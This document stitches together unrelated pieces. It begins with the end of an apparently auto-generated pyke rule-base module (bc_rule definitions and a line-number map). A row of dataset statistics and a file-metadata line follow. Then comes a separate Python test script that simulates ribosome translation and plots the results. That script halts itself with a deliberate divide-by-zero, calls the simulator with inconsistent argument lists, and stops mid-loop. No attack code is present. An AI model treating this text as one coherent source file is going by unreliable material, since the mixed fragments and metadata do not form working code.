contexts.variable('fn_tail1'),
contexts.variable('next_clause_num'),
contexts.variable('require'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names_out'),
contexts.variable('fn_head2'),
contexts.variable('fn_tail2'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('bc_notany', This_rule_base, 'bc_premise',
bc_notany, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('bc_notany'), contexts.variable('bc_premises'), contexts.variable('start_lineno'),), None),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_in'),
contexts.variable('plan_var_out'),
pattern.pattern_literal(()),
contexts.variable('fn_head'),
pattern.pattern_literal(("POPINDENT",)),),
(),
(contexts.variable('break_true'),
contexts.variable('break_false'),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('bc_premises'),
pattern.pattern_literal(False),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_in'),
contexts.variable('plan_var_out'),
pattern.pattern_literal(()),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('no_plan', This_rule_base, 'gen_plan_lines',
no_plan, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
pattern.pattern_literal(None),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),
contexts.variable('fn_head'),
pattern.pattern_literal(()),
pattern.pattern_literal(()),
pattern.pattern_literal(()),),
(),
(contexts.variable('fn_head'),))
bc_rule.bc_rule('as_plan', This_rule_base, 'gen_plan_lines',
as_plan, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('as'), contexts.variable('pat_var_name'),), None),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
pattern.pattern_literal(()),
pattern.pattern_literal(()),),
(),
(pattern.pattern_tuple((contexts.variable('pat_num'), contexts.variable('patterns_out'),), None),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('pat_var_name'),
contexts.variable('pat_num'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('plan_spec', This_rule_base, 'gen_plan_lines',
plan_spec, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('plan_spec'), contexts.variable('step_num'), contexts.variable('plan_var_name'), contexts.variable('python_code'), contexts.variable('plan_vars_needed'), contexts.anonymous('_'), contexts.anonymous('_'),), None),
pattern.pattern_literal(True),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
pattern.pattern_tuple((pattern.pattern_tuple((contexts.variable('step_num'), contexts.variable('python_code'),), None),), None),
contexts.variable('plan_vars_needed'),),
(),
(pattern.pattern_tuple((contexts.variable('pat_num'), contexts.variable('patterns_out'),), None),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('plan_var_name'),
contexts.variable('pat_num'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('illegal_plan_spec', This_rule_base, 'gen_plan_lines',
illegal_plan_spec, None,
(contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),
pattern.pattern_tuple((pattern.pattern_literal('plan_spec'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.variable('lineno'), contexts.variable('lexpos'),), None),
pattern.pattern_literal(False),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),),
(),
(contexts.anonymous('_'),))
bc_rule.bc_rule('plan_bindings', This_rule_base, 'plan_bindings',
plan_bindings, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('plan_var_name'),
contexts.variable('pat_num'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('not_required', This_rule_base, 'add_required',
not_required, None,
(pattern.pattern_literal(False),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
())
bc_rule.bc_rule('required', This_rule_base, 'add_required',
required, None,
(pattern.pattern_literal(True),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('bc_python_premise', This_rule_base, 'bc_premise',
bc_python_premise, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('python_premise'),
contexts.variable('break_cond'),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names'),
contexts.variable('plan_var_names'),
pattern.pattern_literal(()),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(contexts.variable('next_clause_num'),
contexts.variable('clause_num'),
contexts.variable('python_premise'),
contexts.variable('break_cond'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('python_eq', This_rule_base, 'python_premise',
python_eq, None,
(contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('python_eq'), contexts.variable('pattern'), pattern.pattern_tuple((contexts.variable('python_code'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'),), None), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(pattern.pattern_tuple((contexts.variable('pat_num'), contexts.variable('patterns_out'),), None),
contexts.variable('python_code2'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('python_in', This_rule_base, 'python_premise',
python_in, None,
(contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('python_in'), contexts.variable('pattern'), pattern.pattern_tuple((contexts.variable('python_code'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'),), None), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.variable('break_cond'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(pattern.pattern_tuple((contexts.variable('pat_num'), contexts.variable('patterns_out'),), None),
contexts.variable('python_code2'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('python_check', This_rule_base, 'python_premise',
python_check, None,
(contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('python_check'), pattern.pattern_tuple((contexts.variable('python_code'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'),), None), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),
contexts.variable('fn_head'),
pattern.pattern_literal(('POPINDENT',)),),
(),
(contexts.variable('python_code2'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('python_block', This_rule_base, 'python_premise',
python_block, None,
(contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('python_block'), pattern.pattern_tuple((contexts.variable('python_code'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'),), None), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),
pattern.pattern_tuple((pattern.pattern_tuple((pattern.pattern_literal('STARTING_LINENO'), contexts.variable('start_lineno'),), None), contexts.variable('python_code'), pattern.pattern_tuple((pattern.pattern_literal('ENDING_LINENO'), contexts.variable('end_lineno'),), None),), None),
pattern.pattern_literal(()),),
(),
())
from pyke.krb_compiler import helpers
Krb_filename = '../compiler.krb'
Krb_lineno_map = (
((16, 20), (24, 28)),
((24, 24), (30, 30)),
((28, 28), (31, 31)),
((32, 32), (32, 32)),
((35, 43), (33, 33)),
((45, 53), (34, 34)),
((55, 65), (35, 36)),
((68, 80), (37, 49)),
((84, 89), (50, 55)),
((93, 108), (56, 71)),
((140, 144), (74, 74)),
((148, 148), (76, 76)),
((164, 168), (79, 79)),
((172, 174), (81, 83)),
((190, 194), (86, 86)),
((196, 197), (88, 90)),
((200, 200), (92, 92)),
((206, 214), (94, 94)),
((215, 216), (95, 97)),
((229, 229), (98, 98)),
((233, 233), (99, 99)),
((251, 255), (102, 103)),
((258, 276), (105, 107)),
((278, 287), (108, 109)),
((290, 307), (110, 127)),
((311, 318), (128, 135)),
((340, 344), (138, 139)),
((358, 362), (142, 146)),
((365, 383), (148, 152)),
((385, 403), (153, 157)),
((406, 406), (158, 158)),
((426, 430), (161, 167)),
((432, 443), (169, 170)),
((446, 449), (171, 174)),
((453, 453), (175, 175)),
((457, 457), (176, 176)),
((461, 466), (177, 182)),
((488, 492), (185, 186)),
((496, 511), (188, 203)),
((527, 531), (207, 208)),
((535, 545), (210, 220)),
((561, 565), (223, 227)),
((569, 569), (229, 229)),
((572, 590), (230, 234)),
((593, 593), (235, 235)),
((597, 597), (236, 236)),
((619, 623), (239, 242)),
((626, 644), (244, 248)),
((647, 647), (249, 249)),
((665, 669), (252, 256)),
((673, 673), (258, 258)),
((677, 677), (259, 259)),
((680, 698), (260, 264)),
((700, 718), (265, 269)),
((721, 729), (270, 278)),
((733, 733), (279, 279)),
((759, 763), (282, 286)),
((767, 767), (288, 288)),
((771, 771), (289, 289)),
((774, 792), (290, 294)),
((795, 800), (295, 300)),
((822, 826), (303, 306)),
((830, 830), (308, 308)),
((832, 843), (309, 311)),
((858, 862), (314, 314)),
((876, 880), (317, 318)),
((883, 892), (320, 320)),
((894, 903), (321, 321)),
((920, 924), (324, 326)),
((928, 929), (328, 329)),
((933, 942), (330, 339)),
((960, 964), (342, 347)),
((978, 982), (350, 350)),
((984, 986), (352, 355)),
((989, 989), (357, 357)),
((995, 1005), (359, 359)),
((1006, 1008), (360, 363)),
((1021, 1021), (364, 364)),
((1025, 1025), (365, 365)),
((1029, 1029), (366, 366)),
((1049, 1053), (369, 371)),
((1056, 1069), (373, 375)),
((1072, 1074), (376, 378)),
((1078, 1085), (379, 386)),
((1089, 1092), (387, 390)),
((1114, 1118), (393, 395)),
((1121, 1140), (397, 400)),
((1143, 1143), (401, 401)),
((1147, 1150), (402, 405)),
((1154, 1159), (406, 411)),
((1181, 1185), (414, 416)),
((1199, 1203), (419, 423)),
((1206, 1225), (425, 429)),
((1227, 1246), (430, 434)),
((1249, 1249), (435, 435)),
((1253, 1253), (436, 436)),
((1257, 1257), (437, 437)),
((1281, 1285), (440, 446)),
((1289, 1289), (448, 448)),
((1293, 1293), (449, 449)),
((1297, 1298), (450, 451)),
((1302, 1314), (452, 464)),
((1317, 1330), (465, 466)),
((1332, 1348), (467, 470)),
((1351, 1352), (471, 472)),
((1356, 1356), (473, 473)),
((1360, 1363), (474, 477)),
((1395, 1399), (480, 484)),
((1403, 1403), (486, 486)),
((1406, 1425), (487, 491)),
((1427, 1440), (492, 493)),
((1443, 1443), (494, 494)),
((1447, 1447), (495, 495)),
((1471, 1475), (498, 502)),
((1478, 1497), (504, 508)),
((1500, 1500), (509, 509)),
((1518, 1522), (512, 516)),
((1526, 1526), (518, 518)),
((1530, 1530), (519, 519)),
((1533, 1552), (520, 524)),
((1554, 1573), (525, 529)),
((1576, 1584), (530, 538)),
((1608, 1612), (541, 545)),
((1616, 1616), (548, 548)),
((1620, 1620), (549, 549)),
((1623, 1642), (550, 554)),
((1645, 1650), (555, 560)),
((1672, 1676), (563, 565)),
((1680, 1687), (567, 574)),
((1703, 1707), (577, 581)),
((1711, 1713), (583, 585)),
((1716, 1728), (586, 587)),
((1745, 1749), (590, 595)),
((1753, 1755), (597, 599)),
((1758, 1770), (600, 601)),
((1787, 1791), (604, 606)),
((1795, 1796), (608, 609)),
((1812, 1816), (612, 613)),
((1820, 1840), (615, 635)),
((1844, 1844), (636, 636)),
((1862, 1866), (639, 640)),
((1880, 1884), (643, 644)),
((1888, 1891), (646, 649)),
((1895, 1901), (650, 656)),
((1919, 1923), (659, 663)),
((1927, 1927), (665, 665)),
((1929, 1940), (666, 668)),
((1955, 1959), (671, 675)),
((1963, 1964), (677, 678)),
((1968, 1968), (679, 679)),
((1972, 1982), (680, 690)),
((1986, 1988), (691, 693)),
((2010, 2014), (696, 700)),
((2018, 2019), (702, 703)),
((2023, 2023), (704, 704)),
((2027, 2039), (705, 717)),
((2043, 2052), (718, 727)),
((2074, 2078), (730, 735)),
((2082, 2082), (737, 737)),
((2086, 2093), (738, 745)),
((2111, 2115), (748, 756)),
)
| 47.626959 | 351 | 0.501126 | 15,078 | 151,930 | 4.772251 | 0.049144 | 0.15654 | 0.052449 | 0.0404 | 0.929916 | 0.913683 | 0.879204 | 0.849186 | 0.825393 | 0.806854 | 0 | 0.036353 | 0.385671 | 151,930 | 3,189 | 352 | 47.641894 | 0.73459 | 0.000092 | 0 | 0.79168 | 0 | 0 | 0.115954 | 0.010197 | 0 | 0 | 0 | 0 | 0.030313 | 1 | 0.013544 | false | 0 | 0.001612 | 0 | 0.015156 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8fa52a16a911f72fc18439a3042230b1c92bdca4 | 17,112 | py | Python | rsnapsim/defunct/generalized_cpp/test_translation_ssa_generic_lowmem.py | MunskyGroup/rSNAPsim | af3e496d5252e1d2e1da061277123233a5d609b4 | [
"MIT"
] | 1 | 2022-01-28T18:17:37.000Z | 2022-01-28T18:17:37.000Z | rsnapsim/defunct/generalized_cpp/test_translation_ssa_generic_lowmem.py | MunskyGroup/rSNAPsim | af3e496d5252e1d2e1da061277123233a5d609b4 | [
"MIT"
] | null | null | null | rsnapsim/defunct/generalized_cpp/test_translation_ssa_generic_lowmem.py | MunskyGroup/rSNAPsim | af3e496d5252e1d2e1da061277123233a5d609b4 | [
"MIT"
] | 1 | 2020-12-02T06:36:17.000Z | 2020-12-02T06:36:17.000Z | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 27 18:07:30 2020
@author: willi
"""
#Test file for generalized SSA
#import rSNAPsim as rss
import numpy as np
import time
import matplotlib.pyplot as plt
import ssa_translation_generic_lowmem
def generate_additional_ks(enters, pauses, jumps, stops, L):

    def frame_check_1(L, arr):
        return (L - arr[:, 1] + 1) * (arr[:, 1] > 0) + L * (arr[:, 1] > 1)

    def frame_check_3(L, arr):
        return (L - arr[:, 3] + 1) * (arr[:, 3] > 0) + L * (arr[:, 3] > 1)

    def gen_ks_1_loc(L, arr):
        arr[:, 0] = arr[:, 0] + frame_check_1(L, arr)
        arr[:, 1] = arr[:, 2]
        arr = arr[:, 0:2]
        max_arr = np.max(arr[:, 0])
        return arr, max_arr

    def gen_ks_3_loc(L, arr):
        arr[:, 0] = arr[:, 0] + frame_check_1(L, arr)
        arr[:, 1] = arr[:, 2] + frame_check_3(L, arr)
        arr[:, 2] = arr[:, 4]
        arr = arr[:, 0:3]
        max_arr = max([np.max(arr[:, 0]), np.max(arr[:, 1])])
        return arr, max_arr

    max_enter = 0
    max_pause = 0
    max_stop = 0
    max_jump = 0

    k_jumps = np.copy(jumps)
    k_pauses = np.copy(pauses)
    k_stops = np.copy(stops)
    k_enters = np.copy(enters)

    if len(k_enters) != 0:
        k_enters, max_enter = gen_ks_1_loc(L, k_enters)
    if len(k_pauses) != 0:
        k_pauses, max_pause = gen_ks_1_loc(L, k_pauses)
    if len(k_stops) != 0:
        k_stops, max_stop = gen_ks_1_loc(L, k_stops)
    if len(k_jumps) != 0:
        k_jumps, max_jump = gen_ks_3_loc(L, k_jumps)

    max_loc = max(max_jump, max_stop, max_pause, max_enter)

    if max_loc <= L:
        frames_used = 0
    if max_loc > L:
        frames_used = 1
    if max_loc > 2 * L - 1:
        frames_used = 2

    return k_enters, k_pauses, k_stops, k_jumps, frames_used
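# Illustrative sketch (not part of the original script): the frame-offset
# bookkeeping above linearizes (codon, frame) locations so that frame 0 keeps
# its codon index, frame 1 is shifted past codon L, and frame 2 past 2L-1.
# The helper name `linear_location` below is hypothetical; it mirrors the
# arithmetic of frame_check_1 applied to a single row.

```python
def linear_location(codon, frame, L):
    # Mirrors frame_check_1 elementwise: shift by (L - frame + 1) once past
    # frame 0, and by a further L once past frame 1.
    return codon + (L - frame + 1) * (frame > 0) + L * (frame > 1)

L = 100
print(linear_location(5, 0, L))  # frame 0 row [5, 0, .02]: unshifted
print(linear_location(5, 2, L))  # frame 2 row [5, 2, .04]: shifted past 2L
```
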
#rsnap = rss.rSNAPsim()
#rsnap.open_seq_file('gene_files/H2B_withTags.txt')
#rsnap.run_default()
k = np.ones((1,300)).flatten()
kelong = k[1:-1]
kelong[49] = 0
kelong[149]= 0
kelong[248] = 0
#k_fss = np.array([[200,0,200,1,.3]])
k_pause = np.array([[30,0,.005]])
k_enters = np.array([[5,0,.02],[5,2,.04]],dtype=np.float64)
k_stops = np.array([[50,0,10],[50,1,10],[50,2,10]],dtype=np.float64)
k_fss = np.array([[20,0,20,1,1]],dtype=np.float64)
#k_pause = np.array([[30,2,100],[40,2,100]],dtype=np.float64)
k_enters,k_pauses,k_stops,k_jumps,frames_used = generate_additional_ks(k_enters,[],k_fss,k_stops,100)
t_array = np.array([0,100,500],dtype=np.float64)
t0 = 15
t_array = np.linspace(0,400,400,dtype=np.float64)
N_rib = 200
result = np.zeros((len(t_array)*N_rib),dtype=np.int32 )
#kelong = np.array([3.1,3.2,3.3,3.4,3.5,3.1,3.2,3.3,3.4,3.5],dtype=np.float64)
n_trajectories = 10
start = time.time()
all_results = np.zeros((n_trajectories,2,len(t_array)),dtype=np.int32)
lenfrap = len(np.intersect1d(np.where(t_array>0)[0],np.where(t_array<20)[0]))
all_frapresults = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
all_ribtimes = np.zeros((n_trajectories,400),dtype=np.float64)
all_coltimes = np.zeros((n_trajectories,400),dtype=np.int32)
nribs = np.array([0],dtype=np.int32)
all_ribs = np.zeros((n_trajectories,1))
seeds = np.random.randint(0,0x7FFFFFF,n_trajectories)
k_add = np.hstack((k_enters.flatten(),k_pauses.flatten(),k_stops.flatten(),k_jumps.flatten() ))
t_array_copy = np.copy(t_array)
while t_array_copy.shape[0] != 200:
    t_array_copy = np.vstack((t_array_copy, t_array))
probe = np.zeros((298,2)).T
probe[0,10] = 1
probe[0,20] = 1
probe[1,225] = 1
probe[1,215] = 1
#probe = np.cumsum(probe,axis=1)
probe = probe.astype(int).copy(order='C')
for i in range(n_trajectories):
    result = np.zeros((2, len(t_array)), dtype=np.int32)
    frapresult = np.zeros((len(t_array)*N_rib), dtype=np.int32)
    ssa_translation_generic_lowmem.run_SSA_generic(result, kelong, frapresult, t_array, np.array([0, 0, 0], dtype=np.float64), seeds[i], k_add.flatten(), 2, 0, 3, 1, probe, 2, 200)
    all_results[i, :, :] = result
    all_frapresults[i, :] = frapresult

print(result.shape)
print(kelong.shape)
print(frapresult.shape)
print(k_add.flatten().shape)
print(probe.T.astype(int).shape)
traj = all_results[0,:,:].reshape((2,len(t_array))).T
f,ax = plt.subplots(2,1)
ax[0].set_ylim([0,300])
ax[0].fill_between([0,400],[100,100],color='red',alpha=.2)
ax[0].fill_between([0,400],[200,200],color='green',alpha=.2)
ax[0].fill_between([0,400],[300,300],color='blue',alpha=.2)
ax[0].plot(traj,'.')
ax[0].set_xlabel('Time')
ax[0].set_ylabel('Ribosome Location')
ax[0].set_title(' 100 codons, enters: 0,10 and +2,10 FSS: 0,20 to +1,20 Stops: 50 0,1,2' )
spatial_x = (traj + (traj > 100) + (traj > 199))%100
ax[1].set_ylim([0,100])
#ax[1].plot(t_array,spatial_x,'.')
ax[1].plot(t_array_copy.T[traj<=100],spatial_x[traj <= 100],'r.')
ax[1].plot(t_array_copy.T[traj>100],spatial_x[traj > 100],'g.')
ax[1].plot(t_array_copy.T[traj>199],spatial_x[traj > 199],'b.')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('Ribosome Location')
ax[1].set_title(' spatial location ' )
ax[1].legend(['0','+1','+2'])
1/0  # intentional divide-by-zero: halt the script here, before the remaining test cases
###################################################################
k = np.ones((1,300)).flatten()
kelong = k[1:-1]
kelong[49] = 3
kelong[79] = 0
k_enters = np.array([[10,0,.04]],dtype=np.float64)
k_stops = np.array([[50,0,10],[80,0,10]],dtype=np.float64)
k_fss = []
k_pause = []
#k_pause = np.array([[30,2,100],[40,2,100]],dtype=np.float64)
k_enters,k_pauses,k_stops,k_jumps,frames_used = generate_additional_ks(k_enters,k_pause,k_fss,k_stops,100)
t_array = np.array([0,100,500],dtype=np.float64)
t0 = 15
t_array = np.linspace(0,400,400,dtype=np.float64)
N_rib = 200
result = np.zeros((len(t_array)*N_rib),dtype=np.int32 )
#kelong = np.array([3.1,3.2,3.3,3.4,3.5,3.1,3.2,3.3,3.4,3.5],dtype=np.float64)
n_trajectories = 1
start = time.time()
all_results = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
lenfrap = len(np.intersect1d(np.where(t_array>0)[0],np.where(t_array<20)[0]))
all_frapresults = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
all_ribtimes = np.zeros((n_trajectories,400),dtype=np.float64)
all_coltimes = np.zeros((n_trajectories,400),dtype=np.int32)
nribs = np.array([0],dtype=np.int32)
all_ribs = np.zeros((n_trajectories,1))
seeds = np.random.randint(0,0x7FFFFFF,n_trajectories)
k_add = np.hstack((k_enters.flatten(),k_pauses.flatten(),k_stops.flatten(),k_jumps.flatten() ))
t_array_copy = np.copy(t_array)
while t_array_copy.shape[0] != 200:
    t_array_copy = np.vstack((t_array_copy, t_array))
for i in range(n_trajectories):
    result = np.zeros((len(t_array)*N_rib), dtype=np.int32)
    frapresult = np.zeros((len(t_array)*N_rib), dtype=np.int32)
    ribtimes = np.zeros((400), dtype=np.float64)
    coltimes = np.zeros((400), dtype=np.int32)
    ssa_translation_generic_lowmem.run_SSA_generic(result, ribtimes, coltimes, kelong, frapresult, t_array, np.array([0, 0, 0], dtype=np.float64), seeds[i], nribs, k_add.flatten(), len(k_enters), len(k_pauses), len(k_stops), len(k_jumps))
    all_results[i, :] = result
    all_frapresults[i, :] = frapresult
    all_coltimes[i, :] = coltimes
    all_ribtimes[i, :] = ribtimes
    all_ribs[i, :] = nribs[0]
traj = all_results[0,:].reshape((N_rib,len(t_array))).T
f,ax = plt.subplots(2,1)
ax[0].set_ylim([0,300])
ax[0].fill_between([0,400],[100,100],color='red',alpha=.2)
ax[0].fill_between([0,400],[200,200],color='green',alpha=.2)
ax[0].fill_between([0,400],[300,300],color='blue',alpha=.2)
ax[0].plot(traj,'.')
ax[0].set_xlabel('Time')
ax[0].set_ylabel('Ribosome Location')
ax[0].set_title(' 100 codons, enters: 0,10 stops: 0,50 and 0,80' )
spatial_x = (traj + (traj > 100) + (traj > 199))%100
ax[1].set_ylim([0,100])
#ax[1].plot(t_array,spatial_x,'.')
ax[1].plot(t_array_copy.T[traj<=100],spatial_x[traj <= 100],'r.')
ax[1].plot(t_array_copy.T[traj>100],spatial_x[traj > 100],'g.')
ax[1].plot(t_array_copy.T[traj>199],spatial_x[traj > 199],'b.')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('Ribosome Location')
ax[1].set_title(' spatial location ' )
ax[1].legend(['0','+1','+2'])
#####################################################
k = np.ones((1,300)).flatten()
kelong = k[1:-1]
kelong[49] = 0
kelong[179] = 0
k_enters = np.array([[10,0,.04]],dtype=np.float64)
k_stops = np.array([[50,0,10],[80,1,10]],dtype=np.float64)
k_fss = np.array([[30,0,30,1,1]],dtype=np.float64)
k_pause = []
#k_pause = np.array([[30,2,100],[40,2,100]],dtype=np.float64)
k_enters,k_pauses,k_stops,k_jumps,frames_used = generate_additional_ks(k_enters,k_pause,k_fss,k_stops,100)
t_array = np.array([0,100,500],dtype=np.float64)
t0 = 15
t_array = np.linspace(0,400,400,dtype=np.float64)
N_rib = 200
result = np.zeros((len(t_array)*N_rib),dtype=np.int32 )
#kelong = np.array([3.1,3.2,3.3,3.4,3.5,3.1,3.2,3.3,3.4,3.5],dtype=np.float64)
n_trajectories = 1
start = time.time()
all_results = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
lenfrap = len(np.intersect1d(np.where(t_array>0)[0],np.where(t_array<20)[0]))
all_frapresults = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
all_ribtimes = np.zeros((n_trajectories,400),dtype=np.float64)
all_coltimes = np.zeros((n_trajectories,400),dtype=np.int32)
nribs = np.array([0],dtype=np.int32)
all_ribs = np.zeros((n_trajectories,1))
seeds = np.random.randint(0,0x7FFFFFF,n_trajectories)
k_add = np.hstack((k_enters.flatten(),k_pauses.flatten(),k_stops.flatten(),k_jumps.flatten() ))
t_array_copy = np.copy(t_array)
while t_array_copy.shape[0] != 200:
    t_array_copy = np.vstack((t_array_copy, t_array))
for i in range(n_trajectories):
    result = np.zeros((len(t_array)*N_rib), dtype=np.int32)
    frapresult = np.zeros((len(t_array)*N_rib), dtype=np.int32)
    ribtimes = np.zeros((400), dtype=np.float64)
    coltimes = np.zeros((400), dtype=np.int32)
    ssa_translation_generic_lowmem.run_SSA_generic(result, ribtimes, coltimes, kelong, frapresult, t_array, np.array([0, 0, 0], dtype=np.float64), seeds[i], nribs, k_add.flatten(), 1, 0, 2, 1)
    all_results[i, :] = result
    all_frapresults[i, :] = frapresult
    all_coltimes[i, :] = coltimes
    all_ribtimes[i, :] = ribtimes
    all_ribs[i, :] = nribs[0]
traj = all_results[0,:].reshape((N_rib,len(t_array))).T
f,ax = plt.subplots(2,1)
ax[0].set_ylim([0,300])
ax[0].fill_between([0,400],[100,100],color='red',alpha=.2)
ax[0].fill_between([0,400],[200,200],color='green',alpha=.2)
ax[0].fill_between([0,400],[300,300],color='blue',alpha=.2)
ax[0].plot(traj,'.')
ax[0].set_xlabel('Time')
ax[0].set_ylabel('Ribosome Location')
ax[0].set_title(' 100 codons, enters: 0,10 stops: 0,50 and 1,80 FSS: 0,30 to 1,30' )
spatial_x = (traj + (traj > 100) + (traj > 199))%100
ax[1].set_ylim([0,100])
#ax[1].plot(t_array,spatial_x,'.')
ax[1].plot(t_array_copy.T[traj<=100],spatial_x[traj <= 100],'r.')
ax[1].plot(t_array_copy.T[traj>100],spatial_x[traj > 100],'g.')
ax[1].plot(t_array_copy.T[traj>199],spatial_x[traj > 199],'b.')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('Ribosome Location')
ax[1].set_title(' spatial location ' )
ax[1].legend(['0','+1','+2'])
######################
k = np.ones((1,300)).flatten()
kelong = k[1:-1]
kelong[49] = 0
kelong[278] = 0
k_enters = np.array([[10,0,.04],[10,2,.02]],dtype=np.float64)
k_stops = np.array([[50,0,10],[80,2,10]],dtype=np.float64)
k_fss = []
k_pause = []
#k_pause = np.array([[30,2,100],[40,2,100]],dtype=np.float64)
k_enters,k_pauses,k_stops,k_jumps,frames_used = generate_additional_ks(k_enters,k_pause,k_fss,k_stops,100)
t_array = np.array([0,100,500],dtype=np.float64)
t0 = 15
t_array = np.linspace(0,400,400,dtype=np.float64)
N_rib = 200
result = np.zeros((len(t_array)*N_rib),dtype=np.int32 )
#kelong = np.array([3.1,3.2,3.3,3.4,3.5,3.1,3.2,3.3,3.4,3.5],dtype=np.float64)
n_trajectories = 1
start = time.time()
all_results = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
lenfrap = len(np.intersect1d(np.where(t_array>0)[0],np.where(t_array<20)[0]))
all_frapresults = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
all_ribtimes = np.zeros((n_trajectories,400),dtype=np.float64)
all_coltimes = np.zeros((n_trajectories,400),dtype=np.int32)
nribs = np.array([0],dtype=np.int32)
all_ribs = np.zeros((n_trajectories,1))
seeds = np.random.randint(0,0x7FFFFFF,n_trajectories)
k_add = np.hstack((k_enters.flatten(),k_pauses.flatten(),k_stops.flatten(),k_jumps.flatten() ))
t_array_copy = np.copy(t_array)
while t_array_copy.shape[0] != 200:
    t_array_copy = np.vstack((t_array_copy, t_array))
for i in range(n_trajectories):
    result = np.zeros((len(t_array)*N_rib), dtype=np.int32)
    frapresult = np.zeros((len(t_array)*N_rib), dtype=np.int32)
    ribtimes = np.zeros((400), dtype=np.float64)
    coltimes = np.zeros((400), dtype=np.int32)
